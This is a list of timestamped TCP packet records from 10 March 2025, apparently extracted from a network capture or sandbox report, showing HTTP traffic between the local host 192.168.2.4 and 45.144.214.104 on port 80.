Mar 10, 2025 09:03:16.391493082 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391501904 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391518116 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391534090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391568899 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391604900 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391794920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391804934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391814947 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391825914 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391835928 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.391855955 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.391855955 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.392134905 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392144918 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392272949 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.392273903 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392283916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392302990 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392319918 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392323017 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.392330885 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392340899 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392350912 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392354012 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.392364025 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392405987 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.392796040 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392807007 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.392930031 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393021107 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393030882 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393040895 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393052101 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393071890 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393287897 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393376112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393384933 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393394947 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393404961 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393414974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393425941 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393435955 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393448114 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393448114 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393482924 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393799067 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393809080 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393817902 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393836021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393843889 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393851042 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393857956 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.393881083 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.393935919 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.394200087 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394275904 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.394412041 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394428968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394438028 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394448996 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394459009 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394469023 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394485950 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394494057 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394501925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394510031 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394515038 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.394515038 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.394516945 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394526005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394535065 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.394541025 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.394583941 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.394583941 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.395390034 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395401001 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395411015 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395421028 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395431042 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395441055 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395453930 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395462036 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395469904 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395472050 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.395472050 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.395478010 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395487070 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395488977 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395490885 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.395497084 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.395539045 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.395539045 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.396311045 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396323919 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396334887 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396346092 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396357059 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396373987 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396385908 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396398067 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396409035 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396418095 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.396418095 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.396420002 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396431923 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396446943 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.396460056 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.396460056 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.396492004 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397161961 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397172928 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397182941 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397195101 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397205114 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397214890 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397226095 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397237062 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397237062 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397239923 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397249937 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397257090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397264004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397272110 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397274017 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397279024 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397279024 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397299051 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397327900 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.397945881 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397958040 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.397974968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398014069 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.398030996 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.398101091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398113012 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398123980 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398134947 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398145914 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398156881 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398166895 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398179054 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398190975 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398200989 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.398200989 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.398201942 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398216963 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398225069 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398232937 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.398240089 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.398240089 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.398462057 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.413441896 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.486921072 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.486982107 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487019062 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487055063 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487091064 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487124920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487132072 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487132072 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487251997 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487282038 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487315893 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487324953 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487325907 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487370968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487404108 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487437963 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487479925 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487479925 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487484932 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487636089 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487668037 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487704039 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.487715960 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487750053 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.487786055 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522197008 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522212982 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522227049 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522274971 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522286892 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522300959 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522314072 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522365093 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522366047 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522409916 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522453070 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522568941 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522581100 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522620916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522633076 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522646904 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522658110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522658110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522758961 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522799015 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522814035 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522825003 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522866964 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.522962093 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.522974968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523103952 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523133993 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.523289919 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523310900 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.523489952 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523503065 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523514986 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523528099 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523540974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.523564100 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.523564100 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.523843050 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.524669886 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524682999 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524694920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524708033 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524756908 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.524756908 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.524806023 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524817944 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524828911 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524841070 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524852037 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524863958 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524873972 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524884939 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524895906 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.524913073 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.524913073 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.524940968 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526209116 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526221991 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526235104 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526268005 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526288986 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526362896 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526384115 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526396036 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526407003 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526418924 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526432037 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526441097 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526443005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526454926 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526465893 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526479006 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526483059 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526483059 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526490927 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.526520967 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.526520967 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.527966022 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.527978897 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.527993917 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528003931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528011084 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528033018 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528072119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528072119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528101921 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528116941 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528129101 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528140068 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528151989 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528170109 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528170109 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528655052 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528666973 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528677940 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528690100 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528702974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528713942 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528717041 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528726101 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528736115 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528772116 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528772116 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.528960943 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528973103 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.528985977 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529057026 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529387951 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529400110 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529412031 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529431105 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529489994 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529565096 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529577017 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529587984 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529598951 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529611111 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529620886 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529622078 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529633999 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529661894 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529731035 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529742956 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529755116 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529772043 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529818058 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.529896021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529907942 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529921055 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529932976 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.529958963 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530039072 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530050993 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530061960 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530076981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530086994 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530086994 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530200958 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530215025 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530217886 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530236959 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530268908 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530359030 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530375957 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530394077 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530411005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530427933 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530431032 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530431032 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.530445099 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.530536890 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.570167065 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.582943916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.582957029 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.582981110 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.582990885 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583003044 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583014011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583025932 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583095074 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.583158970 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.583681107 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583692074 CET	80	49712	45.144.214.104	192.168.2.4
